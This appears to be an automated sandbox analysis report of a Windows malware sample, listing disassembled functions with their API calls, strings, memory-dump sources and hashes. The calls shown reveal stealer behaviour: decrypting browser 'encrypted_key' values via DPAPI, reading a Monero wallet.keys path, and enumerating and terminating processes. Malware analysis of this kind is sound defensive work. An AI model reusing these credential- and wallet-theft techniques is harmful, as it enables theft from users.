                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F31678,00F30D93), ref: 00F1F64C
                                      • lstrlen.KERNEL32(00000000), ref: 00F1F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: bad20134cfc73e7b9a500b227c26d9ec1c2291029c830ef9a9bb62376de3ce7f
                                      • Instruction ID: 60b4be3ca25fce1d9c2b806b8d1f2cc9a6d793871a98ed723db171a59985ac59
                                      • Opcode Fuzzy Hash: bad20134cfc73e7b9a500b227c26d9ec1c2291029c830ef9a9bb62376de3ce7f
                                      • Instruction Fuzzy Hash: 9C51F171D101189BCB04FBE4ED66DED7379BF94304F408568F91667191EE386A08DB62
                                      Function 00F237B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: c774b1bfdcad5ba213c00905da51ae2c12d26ff61d5e1ff6660d84a1c73c24e5
                                      • Instruction ID: 16ab81d14329caf7bd3c96ad98e8b482790f5ae270295aaecca369031d401cf2
                                      • Opcode Fuzzy Hash: c774b1bfdcad5ba213c00905da51ae2c12d26ff61d5e1ff6660d84a1c73c24e5
                                      • Instruction Fuzzy Hash: B24130B1D001199BDB04EFE4EC55AEEB779AF44314F008019F5167B280EB78AA45EFA2
                                      Function 00F1A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F1A489
                                        • Part of subcall function 00F1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A23F
                                        • Part of subcall function 00F1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00F14F3E,00000000,?), ref: 00F1A251
                                        • Part of subcall function 00F1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A27A
                                        • Part of subcall function 00F1A210: LocalFree.KERNEL32(?,?,?,?,00F14F3E,00000000,?), ref: 00F1A28F
                                        • Part of subcall function 00F1A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F1A2D4
                                        • Part of subcall function 00F1A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F1A2F3
                                        • Part of subcall function 00F1A2B0: LocalFree.KERNEL32(?), ref: 00F1A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: 3f61e946e7f4bc5f68e3974d9015a837487b97a6d774de6d10beeae0d512ed9f
                                      • Instruction ID: 4bd50044ea5ebde9166ba73ce3044709683edf0a114652b31ac365402c83441a
                                      • Opcode Fuzzy Hash: 3f61e946e7f4bc5f68e3974d9015a837487b97a6d774de6d10beeae0d512ed9f
                                      • Instruction Fuzzy Hash: 99316FB6D11208ABCF04DFE4EC45AEFB3B9BF58344F444518E901A3241EB35DA44DBA2
                                      Function 00F29660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00F2967B
                                        • Part of subcall function 00F28EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F296AE,00000000), ref: 00F28EEB
                                        • Part of subcall function 00F28EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00F28EF2
                                        • Part of subcall function 00F28EE0: wsprintfW.USER32 ref: 00F28F08
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00F2973B
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F29759
                                      • CloseHandle.KERNEL32(00000000), ref: 00F29766
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      • Opcode ID: 53d393cc06cdc5a5f5692ad6569d95c1df7fbc1d6df9eecd542c1d3742a3a691
                                      • Instruction ID: 1d79fce179477a08a58c1ad78aef8c2e139cc0aeff79cdcb62077aedb0218efa
                                      • Opcode Fuzzy Hash: 53d393cc06cdc5a5f5692ad6569d95c1df7fbc1d6df9eecd542c1d3742a3a691
                                      • Instruction Fuzzy Hash: 35315E75E002189BDF14DFE0ED49BEDB7B9BB44700F104458F506AF188DBB89A84DB91
                                      Function 00F28810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F305BF), ref: 00F2885A
                                      • Process32First.KERNEL32(?,00000128), ref: 00F2886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00F28883
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • CloseHandle.KERNEL32(?), ref: 00F288F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 39d7d5a25c884ea18bcb679d34c6c788870db74990acee17555854221f6151c7
                                      • Instruction ID: a31d3fccc6e7f4eb0ae8ec965116f0bb0cc970a5b43715b5166198f0801bbd5f
                                      • Opcode Fuzzy Hash: 39d7d5a25c884ea18bcb679d34c6c788870db74990acee17555854221f6151c7
                                      • Instruction Fuzzy Hash: A9316B71901228ABCB24DF94EC51FEEB3B8FF44700F1045A9F10AA6190EB34AA44DFA1
                                      Function 00F8FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F8FE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F8FE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 89045ac30240127d22d86ed660ee710f5feaef9669309319ffa8d7384a0c573e
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: A9018432509726EEFE3436759CC9AAB3694FB017B57344339F116851F2EF564C45B240
                                      Function 00F27B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F30DE8,00000000,?), ref: 00F27B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00F30DE8,00000000,?), ref: 00F27B54
                                      • wsprintfA.USER32 ref: 00F27B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: e45da9ae76ed2bf0db27001a93027640aef836c39ba8d25b2303ddd4c8b1b563
                                      • Instruction ID: 8ed22c5836b10b7a3015c7a7c50678c1d0b2e289090c43d356a8e444dc512d98
                                      • Opcode Fuzzy Hash: e45da9ae76ed2bf0db27001a93027640aef836c39ba8d25b2303ddd4c8b1b563
                                      • Instruction Fuzzy Hash: 66112AB2904219ABDB18DBC9E945BBEBBF8EB4CB11F10411AF615A6284D2395980D7B0
                                      Function 00F29470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00F23D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00F23D3E,?), ref: 00F2948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00F23D3E), ref: 00F294A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 00F294B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: 07615811229a2140aa72aed2ab3ef00d779fdaec0024745e8830792f66c26c05
                                      • Instruction ID: d0e37c0c9c5f1d72a6c528099942c154ed340aabd2686750778439312f8f4ab5
                                      • Opcode Fuzzy Hash: 07615811229a2140aa72aed2ab3ef00d779fdaec0024745e8830792f66c26c05
                                      • Instruction Fuzzy Hash: 87F04439E04308BBDB24DFF0EC49F5E77BAAB48714F10C554FA11AB1C4D67096419B90
                                      Function 00F2CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00F2CA7E
                                        • Part of subcall function 00F2C2A0: __amsg_exit.LIBCMT ref: 00F2C2B0
                                      • __getptd.LIBCMT ref: 00F2CA95
                                      • __amsg_exit.LIBCMT ref: 00F2CAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00F2CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 8e0a58d4b45469e0c7938420302ca4f378266aa6abb52943b620d540acc73859
                                      • Instruction ID: abc78b01137080a79d486981080fee8d158b46b1e41b2d5a2105a35d7356ae37
                                      • Opcode Fuzzy Hash: 8e0a58d4b45469e0c7938420302ca4f378266aa6abb52943b620d540acc73859
                                      • Instruction Fuzzy Hash: 72F06D32944338DBD721FBA8BC1274E33A0AF00720F100149E805AB1D2CB2C5941BBD6
                                      Function 00F904D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
